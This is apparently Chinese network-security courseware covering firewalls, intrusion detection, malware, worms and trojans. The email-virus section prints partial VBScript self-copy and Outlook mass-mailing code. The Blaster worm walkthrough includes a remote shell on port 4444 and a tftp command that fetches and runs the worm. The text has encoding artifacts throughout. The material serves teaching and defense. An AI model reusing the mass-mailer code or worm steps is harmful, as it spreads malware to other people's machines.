網絡安全技術第六章-網絡安全防護技術課件

1、第6章 網絡安全防護技術網絡安全防護技術是指為防止網絡通信阻塞、中斷、癱瘓或被非法控制等以及網絡中傳輸、存儲、處理的數據信息丟失、泄露或被非法篡改等所需要的相關技術。本章主要針對常見的網絡攻擊手段、入侵機制，討論一些針對性較強的網絡安全防護技術，如防火墻、入侵檢測及惡意代碼防范與響應等。雖然這些技術對防御具體的入侵機制很有效，但畢竟合法系統(tǒng)難以預測攻擊者究竟會以什么樣的機制實施入侵，攻擊者也肯定不會總遵循固定的規(guī)則實施攻擊，因此需要更具有普遍性的解決方案，進而引入了對入侵檢測系統(tǒng)、網絡攻擊取證與安全審計等方面的討論。第6章 網絡安全防護技術6.1 防火墻技術6.1.1 防火墻概述6.1.2 防

2、火墻技術原理6.1.3 防火墻的體系結構6.1.4 防火墻的部署應用實例6.1.5 典型硬件防火墻的配置6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)6.2.2 入侵檢測系統(tǒng)的分析技術6.2.3 入侵檢測系統(tǒng)的設置與部署6.2.4 典型入侵檢測系統(tǒng)應用實例6.3 惡意代碼防范與應急響應6.3.1 何謂惡意代碼與應急響應6.3.2 網絡病毒及其防范6.3.3 網絡蠕蟲6.3.4 特洛伊木馬6.3.5 網頁惡意代碼6.3.6 僵尸網絡6.4 網絡攻擊取證與安全審計6.4.1 計算機取證技術6.4.2 網絡安全審計6.1 防火墻技術6.1.1防火墻概述防火墻是一種綜合性較強的網絡防護工具，涉及到計

3、算機網絡技術、密碼技術、軟件技術、安全協(xié)議、安全標準、安全操作系統(tǒng)等多方個面。它通常是一種軟件和硬件的組合體，用于網絡間的訪問控制，防止外部非法用戶使用內部網絡資源，保護內部網絡的設備不被破壞，防止內部網絡的敏感數據被竊取。防火墻具有過濾進出網絡的數據、管理進出網絡的訪問行為、禁止非法訪問等基本功能。6.1 防火墻技術6.1.1防火墻概述1.防火墻的基本概念所謂防火墻是指設置在不同網絡或網絡安全域之間的一系列部件的組合。它是不同網絡或網絡安全域之間信息的唯一出入口，能根據部門的安全策略控制（允許、拒絕、監(jiān)測）出入網絡的數據流，且本身具有較強的抗攻擊能力。在物理組成上，防火墻系統(tǒng)可以是路由器，也

4、可以是個人計算機、主機系統(tǒng)，或一批向網絡提供安全保障的軟硬件系統(tǒng)。在邏輯上，防火墻是一個分離器、一個限制器，也可以是一個分析器。6.1 防火墻技術6.1.1防火墻概述1.防火墻的基本概念圖6-1 防火墻邏輯示意圖6.1 防火墻技術6.1.1防火墻概述2防火墻的主要功能1）通過防火墻可以定義一個阻塞點(控制點)，過濾進、出網絡的數據，管理進、出網絡的訪問行為，過濾掉不安全服務和非法用戶，以防止外來入侵。2）控制對特殊站點的訪問，例如可以配置相應的WWW和FTP服務，使互聯(lián)網用戶僅可以訪問此類服務，而禁止對其它系統(tǒng)的訪問。3）記錄內外通信的有關狀態(tài)信息日志，監(jiān)控網絡安全并在異常情況下給出告警。4）

5、可用作IPSec的平臺，如可以用來實現(xiàn)虛擬專用網（VPN）。6.1 防火墻技術6.1.1防火墻概述3.防火墻的實現(xiàn)原則防火墻是一個矛盾統(tǒng)一體，它既要限制數據的流通，又要保持數據的流通。實現(xiàn)防火墻時可遵循兩項基本原則：1）一切未被允許的都是禁止的。根據這一原則，防火墻應封鎖所有數據流，然后對希望提供的服務逐項開放。這種方法很安全，因為被允許的服務都是仔細挑選的；但限制了用戶使用的便利性，用戶不能隨心所欲地使用網絡服務。2）一切未被禁止的都是允許的。根據這一原則，防火墻應轉發(fā)所有數據流，然后逐項屏蔽可能有害的服務。這種方法較靈活，可為用戶提供更多的服務，但安全性差一些。由于這兩種防火墻實現(xiàn)原則在安

6、全性和可使用性上各有側重，實際中，很多防火墻系統(tǒng)在兩者之間做一定的折衷。6.1 防火墻技術6.1.1防火墻概述4.防火墻的主要類型（1）包過濾防火墻（2）應用代理防火墻（3）電路層防火墻（4）狀態(tài)檢測防火墻6.1 防火墻技術6.1.2 防火墻技術原理自采用包過濾技術的第一代防火墻到現(xiàn)在，防火墻技術經歷了包過濾、應用代理、狀態(tài)檢測及深度檢測技術等發(fā)展階段，目前，已有多種防火墻技術可供網絡安全管理員選擇使用。1.包過濾技術簡單的說，包過濾(Packet Filtering)就是在網絡層，依據系統(tǒng)事先設定的過濾規(guī)則，檢查數據流中的每個包，根據包頭信息來確定是否允許數據包通過。6.1 防火墻技術6.1

7、.2 防火墻技術原理1.包過濾技術圖 6-2 包過濾工作原理6.1 防火墻技術6.1.2 防火墻技術原理2.代理服務器技術所謂代理服務器是指代表內網向外網服務器進行連接請求的服務程序，其基本工作原理是：代理服務器監(jiān)聽網絡內部客戶機的服務請求，當一個連接到來時，首先進行身份和授權訪問等級認證，并根據安全策略決定是否中轉。當請求符合安全策略時，代理服務器上的客戶機進程代表這個請求向真正的服務器發(fā)出請求，然后將服務器的響應數據轉發(fā)給內部客戶機。6.1 防火墻技術6.1.2 防火墻技術原理3.狀態(tài)檢測技術其關鍵是在防火墻的核心部分建立狀態(tài)連接表，并將進出網絡的數據包當成一個一個的會話，利用狀態(tài)連接表跟

8、蹤每一個會話狀態(tài)。狀態(tài)檢測防火墻不僅根據規(guī)則表對每一個數據包進行檢查，而且還考慮數據包是否符合會話所處的狀態(tài)，通過對高層的信息進行某種形式的邏輯或數學運算，提供對傳輸層的控制。6.1 防火墻技術6.1.2 防火墻技術原理3.狀態(tài)檢測技術如表6-3所列，每個當前建立的連接都記錄在狀態(tài)連接表里，如果一個數據包的源端口是系統(tǒng)內部的一個介于1024和16383之間的端口，而且它的信息與狀態(tài)連接表里的某一條記錄相符，包過濾器才允許它進入。源地址源端口目的地址目的端口連接狀態(tài)011030980已建立0210312380已建立06103325已建立9335679已建立223.256.18.23102580已

9、建立表6-3 狀態(tài)檢測防火墻的狀態(tài)連接表示例6.1 防火墻技術6.1.3 防火墻的體系結構目前，防火墻的體系結構有雙重宿主主機體系結構、屏蔽主機體系結構、屏蔽子網體系結構，以及新型混合防火墻體系結構等類型。1.雙重宿主主機體系結構6.1 防火墻技術6.1.3 防火墻的體系結構2.屏蔽主機體系結構圖6-8 屏蔽主機防火墻體系結構6.1 防火墻技術6.1.3 防火墻的體系結構3.屏蔽子網體系結構圖6-9 屏蔽子網防火墻體系結構6.1 防火墻技術6.1.4 防火墻的部署應用實例1區(qū)域分割的層疊方式圖6-10 防火墻系統(tǒng)的層疊方式6.1 防火墻技術6.1.4 防火墻的部署應用實例2.區(qū)域分割的三角方式

10、圖6-11 以區(qū)域分割的三角方式部署防火墻6.1 防火墻技術6.1.4 防火墻的部署應用實例3.防火墻存在的缺陷1）防火墻不能防御不經過防火墻的攻擊。2）防火墻不能防止感染了病毒的軟件或文件的傳輸。這只能在每臺主機上裝反病毒軟件。3）防火墻只能用來防御已知的威脅，不能防御全部的威脅。4）防火墻不能防御惡意的內部用戶。6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)入侵是指未經授權蓄意嘗試訪問、篡改數據，使網絡系統(tǒng)不可使用的行為。入侵檢測（Intrusion Detection），顧名思義便是對入侵行為的發(fā)覺,即在計算機網絡系統(tǒng)中的若干關鍵點搜集信息，通過對所收集信息的分析發(fā)現(xiàn)網絡系統(tǒng)中是否有違

11、反安全策略的行為和遭到攻擊的跡象。入侵檢測的目的主要是：識別入侵者；識別入侵行為；檢測和監(jiān)視以實施的入侵行為；為對抗入侵提供信息，阻止入侵的發(fā)生和事態(tài)的擴大。進行入侵檢測的軟件、硬件組合便是入侵檢測系統(tǒng)。6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)1入侵檢測系統(tǒng)的基本結構圖6-12 入侵檢測系統(tǒng)的基本結構6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)2.入侵檢測系統(tǒng)的主要功能入侵檢測系統(tǒng)作為一種積極主動的安全防護工具，提供了對內部攻擊、外部攻擊和誤操作的實時防護，在網絡系統(tǒng)受到危害之前進行報警、攔截和響應。一般說來，IDS應具有的功能為：監(jiān)控、分析用戶和系統(tǒng)的活動；核查系統(tǒng)配置和漏洞；評

12、估關鍵系統(tǒng)和數據文件的完整性；對異常行為統(tǒng)計分析，識別攻擊的活動模式并報警；對操作系統(tǒng)進行審計、跟蹤管理。6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)3.入侵檢測的過程(1)信息收集入侵檢測的第一步是信息收集，收集的內容包括系統(tǒng)、網絡、數據及用戶活動的狀態(tài)和行為。（2)數據分析對收集到的數據進行分析是入侵檢測系統(tǒng)的核心工作。按照數據分析的方式，一般有三種手段：模式匹配。統(tǒng)計分析。完整性分析。（3)結果處理通過數據分析發(fā)現(xiàn)了入侵跡象時，入侵檢測系統(tǒng)把分析結果記錄在日志文件中，并產生一個告警報告，同時還要觸發(fā)警報到控制臺。6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)4入侵檢測系統(tǒng)的分類（1

13、）按照入侵檢測的體系結構劃分基于主機的入侵檢測系統(tǒng)、基于網絡的入侵檢測系統(tǒng)和分布式入侵檢測系統(tǒng)。（2）按照入侵檢測的時間分類實時入侵檢測系統(tǒng)和事后入侵檢測系統(tǒng)兩種類型。6.2 入侵檢測系統(tǒng)6.2.2 入侵檢測系統(tǒng)的分析技術1.異常入侵檢測技術（1）基于統(tǒng)計學方法的異常分析（2）基于計算機免疫技術的異常檢測方法（3）基于數據挖掘的異常檢測方法2.特征分析檢測技術（1）模式匹配（2）專家系統(tǒng)6.2 入侵檢測系統(tǒng)6.2.3 入侵檢測系統(tǒng)的設置與部署1.網絡入侵檢測系統(tǒng)的設置步驟6.2 入侵檢測系統(tǒng)6.2.3 入侵檢測系統(tǒng)的設置與部署2.入侵檢測系統(tǒng)部署（1）基于網絡入侵檢測系統(tǒng)的部署一般說來，可以將

14、入侵檢測系統(tǒng)的部署點劃分為外網入口、DMZ區(qū)、內網主干和關鍵子網4個部署點，如圖6-14所示是一個部署入侵檢測系統(tǒng)的典型方案。6.3 惡意代碼防范與應急響應6.3.1 何謂惡意代碼與應急響應何謂惡意代碼？它們從哪里來？是如何傳播的？應該如何防止？如果已經被惡意代碼侵害，又應該如何處理？這些都是惡意代碼防范與應急響應所要討論的重要內容。1.惡意代碼的含義所謂惡意代碼（Malicious Code）實質上是指一種在一定環(huán)境下可以獨立執(zhí)行的計算機程序或者嵌入到其它程序中的代碼，也稱之為惡意軟件（Malicious Software）。惡意代碼能在不被用戶察覺的情況下啟動運行，破壞計算機系統(tǒng)的安全性和

15、完整性。6.3 惡意代碼防范與應急響應6.3.1 何謂惡意代碼與應急響應1.惡意代碼的含義（1）惡意代碼的分類1）不感染的依附性惡意代碼。這類惡意代碼主要有木馬（Trojan）、邏輯炸彈(Logic Bomb)及后門(Back Door)或者陷門（Trap Door）等。2）不感染的獨立性惡意代碼。這類惡意代碼主要有點滴器（Dropper）、繁殖器(Generator)、惡作劇（Hoax）等。3）可感染的依附性惡意代碼。這類惡意代碼主要是指一段依附在其它程序上、可以進行自我繁殖的計算機病毒。4)可感染的獨立性惡意代碼。這類惡意代碼主要有蠕蟲（Worm）、網頁惡意代碼、計算機細菌(Germ)及僵

16、尸網絡等。6.3 惡意代碼防范與應急響應6.3.1 何謂惡意代碼與應急響應1.惡意代碼的含義（2）惡意代碼的傳播一般情況下，惡意代碼有三種傳播途徑：一是利用操作系統(tǒng)漏洞或者軟件漏洞傳播；二是通過瀏覽器傳播；三是利用用戶的信任關系傳播。 6.3 惡意代碼防范與應急響應6.3.1 何謂惡意代碼與應急響應2.什么是應急響應所謂應急響應(Incident Response或Emergency Response)通常指一個組織為了應對各種突發(fā)事件的發(fā)生所做的準備，以及在突發(fā)事件發(fā)生后所采取的措施和行動。6.3 惡意代碼防范與應急響應6.3.2 網絡病毒及其防范1.網絡病毒的概念（1）計算機病毒的定義從廣

17、義上講，凡能夠引起計算機系統(tǒng)故障，破壞計算機數據的程序統(tǒng)稱為計算機病毒。簡言之，計算機病毒就是一種惡意代碼，即可感染的依附性惡意代碼。它隱藏在計算機系統(tǒng)資源中，能影響系統(tǒng)正常運行，并通過系統(tǒng)資源共享等途徑進行傳播。計算機病毒一般由三部分組成：主控程序負責病毒程序的組裝和初始化工作；傳染程序將病毒程序傳染到其它的可執(zhí)行程序上去；破壞程序實現(xiàn)病毒程序編制者的破壞意圖。6.3 惡意代碼防范與應急響應6.3.2 網絡病毒及其防范1.網絡病毒的概念（2）網絡病毒的含義若按病毒傳播方式劃分，可以將其分為單機病毒和網絡病毒兩類。所謂網絡病毒是指，通過網絡通信機制，引起計算機系統(tǒng)、網絡系統(tǒng)故障，破壞網絡通信及

18、數據的惡意代碼。網絡病毒除具有計算機病毒的一般特性之外，還呈現(xiàn)出如下一些新的特點。1）傳染速度快。2）清除難度大。3）破壞性強。6.3 惡意代碼防范與應急響應6.3.2 網絡病毒及其防范2.計算機病毒的結構及工作機制（1）計算機病毒的結構計算機病毒的基本特征是引導、觸發(fā)、傳染和破壞，因此一個計算機病毒一般由引導模塊、觸發(fā)模塊、傳染模塊和破壞模塊組成。圖6-16 計算機病毒工作機制示意圖6.3 惡意代碼防范與應急響應6.3.2 網絡病毒及其防范3.典型郵件病毒代碼分析通過Outlook傳播的病毒基本上用VBScript語言編寫而成，其自我復制原理也是利用程序本身的腳本內容復制一份到一個臨時文件，

19、然后再在傳播環(huán)節(jié)將其作為附件發(fā)送出去。例如，使用如下兩行代碼就可以將自身復制到C盤根目錄下的temp.vbs文件中。Set fso=CreateObject(“Scripting.FileSystemObject”)Fso.GetFile(WScript.ScriptFullName).Copy(“C:temp.vbs”)其中，第一行創(chuàng)建一個文件系統(tǒng)對象。第二行前面是打開這個腳本文件，WScript.ScriptFullName用于指明是這個程序本身，即一個完整的路徑文件名；用GetFile函數獲得這個文件；使用Copy函數將這個文件復制到C盤根目錄下的temp.vbs文件中。6.3 惡意代碼

20、防范與應急響應6.3.2 網絡病毒及其防范3.典型郵件病毒代碼分析如下的代碼段可實現(xiàn)郵件病毒的傳播：Set ola=CreateObject(“Outlook.Application”)On Error Resume Nextfor i=1 to 60Set Mail=ola.CreateItem(0)Mail.to=ola.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(x)Mail.Subject=“Betreffder E-Mail”Mail.Body=“Textder E-Mail”Mail.Attachments.Add(“C:

21、temp.vbs”)Mail.SendOla.Quit6.3 惡意代碼防范與應急響應6.3.2 網絡病毒及其防范4.病毒的防范措施1）從管理上，建立嚴格的計算機使用、管理制度，執(zhí)行有效的應用和操作規(guī)范；對外來軟件和存儲介質進行病毒檢查，嚴禁使用來歷不明的軟件；保護好隨機攜帶的原始資料和軟件版本，建立安全的資料備份制度；對計算機定期進行病毒檢測，一旦發(fā)現(xiàn)病毒立即隔離，防止擴散，并報告主管部門；購買計算機時，必須考慮對計算機病毒的防范。2）從技術上，配備病毒檢測程序，及時發(fā)現(xiàn)并消除病毒；制訂病毒侵入應急技術措施，減少病毒造成的損失；嚴格保護硬盤，設置禁寫保護，防止非法裝載硬盤；采取加密手段，防止病

22、毒入侵；研制“病毒疫苗”程序，增強程序的防病毒能力；創(chuàng)建安全操作系統(tǒng)，防止病毒破壞。3）在法律上，制訂相應法規(guī)，對制造、施放和出售病毒的行為，給予嚴懲。6.3 惡意代碼防范與應急響應6.3.3 網絡蠕蟲1.蠕蟲病毒蠕蟲(Worm)，從廣義上來講一般認為是一種通過網絡傳播的惡性病毒，但蠕蟲病毒與一般病毒有很大區(qū)別，蠕蟲是一種通過網絡傳播的惡性病毒，具有病毒的一些共性，如傳播性、隱蔽性、破壞性等；同時又有自己的一些特征，如不利用文件寄生(只存在于內存中)，對網絡造成拒絕服務等。按照攻擊對象不同，可以將蠕蟲病毒分為兩類：一類是面向企業(yè)用戶和局域網的蠕蟲，主要利用系統(tǒng)漏洞主動進行攻擊破壞。這類蠕蟲病毒

23、以“紅色代碼”、“尼姆達”以及“SQL蠕蟲王”等為代表。另一類是針對個人用戶的蠕蟲，通過網絡（主要是電子郵件、惡意網頁等形式）進行傳播。這類蠕蟲病毒以“愛蟲”、“求職信”等病毒為代表。6.3 惡意代碼防范與應急響應6.3.3 網絡蠕蟲1.蠕蟲病毒蠕蟲的工作過程一般為：掃描：蠕蟲開始隨機選取某一段IP地址，然后對這一IP地址段上的主機進行掃描，探測存在漏洞的主機。有時可能會不斷重復這一掃描過程。這樣，隨著蠕蟲的傳播，新感染的主機也開始進行這種掃描。網絡上的掃描包就越多。攻擊：當蠕蟲掃描到網絡中存在漏洞的主機后，就開始利用自身的破壞功能獲取主機的管理員權限。利用原主機與新主機的交互，將蠕蟲程序復制

24、到新主機并啟動。6.3 惡意代碼防范與應急響應6.3.3 網絡蠕蟲2.蠕蟲程序的功能結構和傳播流程圖6-17 蠕蟲程序的功能結構模型6.3 惡意代碼防范與應急響應6.3.3 網絡蠕蟲2.蠕蟲程序的功能結構和傳播流程圖6-18 蠕蟲程序傳播流程6.3 惡意代碼防范與應急響應6.3.3 網絡蠕蟲3.典型蠕蟲病毒實例分析沖擊波蠕蟲病毒執(zhí)行流程如下:1)病毒運行時首先在內存中建立一個名為:“msblast.exe”的進程，該進程就是活的病毒體。病毒還會修改注冊表，在“HKEY_LOCAL_MACH INESOFTWAREMicrosoftWindowsCurrentVersion Run”中添加鍵值:

25、“windows autoupdate = msblast.exe”，這樣在每次啟動系統(tǒng)時，病毒就會自動運行。2)判斷BILLY互斥體，如果已經感染，蠕蟲退出。3)以20秒為間隔，檢測一次網絡連接狀態(tài)。若未連入網絡，永遠循環(huán)。4)判斷日期大于15號、月份大于8，蠕蟲啟動syn flood攻擊某網站更新站點，例如的Web服務端口80。5)首先感染子網IP地址，然后隨機感染外網IP地址。6)感染其它主機，若緩沖區(qū)溢出成功，遠程主機會在4444端口監(jiān)聽，提供cmd shell服務；然后本地開啟tftp(69端口)服務，接著利用連接4444端口socket發(fā)送命令tftp - i ip GET msb

26、last.exe，最后執(zhí)行get后的程序。6.3 惡意代碼防范與應急響應6.3.3 網絡蠕蟲4.網絡蠕蟲的防范措施(1)修補系統(tǒng)漏洞(2)刪除蠕蟲要利用的程序(5)接種疫苗(4)采用入侵檢測技術(3)配置合適的網絡防火墻6.3 惡意代碼防范與應急響應6.3.3 網絡蠕蟲5.網絡蠕蟲的清除方法(1)用殺毒軟件查殺(2)手工清除先撥掉網線，啟動任務管理器，在其中查找msblast.exe進程，找到后在進程上單擊右鍵，選擇結束進程。用文件搜索的方法查找到Msblast.exe后刪除。修改注冊表，點開始菜單中的運行，輸入regedit后點確定運行注冊表編輯器，找到“HKEY_LOCAL_MACH IN

27、ESoftwareMicrosoftWindowsCurrentVersionRun”后，在右邊找到鍵值“windows autoupdate=msblast.exe”，將其刪除。重啟計算機并打上補丁，以免計算機再次遭受蠕蟲攻擊。連接網線，恢復正常工作。6.3 惡意代碼防范與應急響應6.3.4 特洛伊木馬1.木馬的含義簡單地講，木馬是一種帶有惡意性質的遠程控制軟件。一般的木馬包括一個服務器程序和一個客戶機程序。服務器程序負責打開攻擊的通道，放置在被入侵的計算機中，就像一個內奸特務。通常所說的木馬程序即是服務器程序?？蛻魴C程序放在木馬控制者的計算機中，負責攻擊目標主機。6.3 惡意代碼防范與應急

28、響應6.3.4 特洛伊木馬2.木馬系統(tǒng)的關鍵技術（1）遠程啟動技術1）注冊表啟動。2）Windows系統(tǒng)服務。3）系統(tǒng)配置文件。4）修改文件關聯(lián)。（2）自動隱藏技術1）進程插入。2）核心態(tài)隱藏。3）隱蔽通信技術。4）反彈式木馬技術。（3）自動加載技術（4）輸入設備控制（5）遠程文件管理6.3 惡意代碼防范與應急響應6.3.4 特洛伊木馬3木馬自動加載程序代碼示例 6.3 惡意代碼防范與應急響應6.3.4 特洛伊木馬4.木馬病毒的檢測（1）檢查網絡通信流量（2）查看進程與網絡連接（3）檢查啟動項（4）檢查系統(tǒng)賬戶（5）查看進程加載的服務（6）使用病毒檢測軟件查殺木馬6.3 惡意代碼防范與應急響應

29、6.3.5 網頁惡意代碼網頁惡意代碼又稱為網頁病毒，主要指某些網站使用的惡意代碼。它用腳本語言來實現(xiàn)相關功能，利用軟件和操作系統(tǒng)安全漏洞通過網頁進行傳播。網頁惡意代碼依賴于腳本引擎解釋執(zhí)行。1.網頁惡意代碼的特點及安全威脅網頁惡意代碼的常見危害形式有：1）更改主頁設置；2）隱藏“開始”菜單的命令；3）隱藏“我的電腦”中的硬盤；3）隱藏桌面圖標；4）禁用DOS程序；5）修改登錄窗口；6）修改IE瀏覽器的標題，即修改瀏覽器最上方的藍色標題欄中的文字，在上面加入廣告或宣傳文字。6.3 惡意代碼防范與應急響應6.3.5 網頁惡意代碼2.網頁惡意代碼的類型1）基于JavaScript的腳本病毒。2）基于

30、VBScript的腳本病毒。3）基于PHP的腳本病毒。4）腳本語言與木馬結合的病毒。6.3 惡意代碼防范與應急響應6.3.5 網頁惡意代碼4.網頁惡意代碼的防范與清除1）不要輕易瀏覽一些來歷不明的網站，特別是有不良內容的網站。2）如果系統(tǒng)己經遭到網頁惡意代碼的攻擊，可采用手工修改注冊表相關鍵值的方法恢復系統(tǒng)。3）修改Windows IE瀏覽器中Internet選項的安全級別，把安全級別由“中”改為“高”。4）鑒于某些惡意代碼調用ActiveXComponent類，可以對“C:WindowsJavaPackages”文件夾中含有ActiveXComponent.class類的ZIP文件重命名，還可以直接把Java文件夾重命名。5）如果己經知道某些網站具有惡意代碼，可以在IE的Internet選項中啟用分級審查，在許可站點標簽中輸入不想訪問的網址，以便永不進入這些具有惡意代碼的網站。6.4 網絡攻擊取證與安全審計6.4.1 計算機取證技術1.數字證據的概念（1）數字證據的定義數字證據也稱為計算機證據。計算機證據國際組織（International Organization on Computer Evidence，IOCE）給出的與數字證據相關的定義為：1）數字證據：法庭上可能成為證據的以二進制形式存儲或傳送的信息。2）原始數字證據：查封計算機犯罪現(xiàn)場時，相關物理介質及其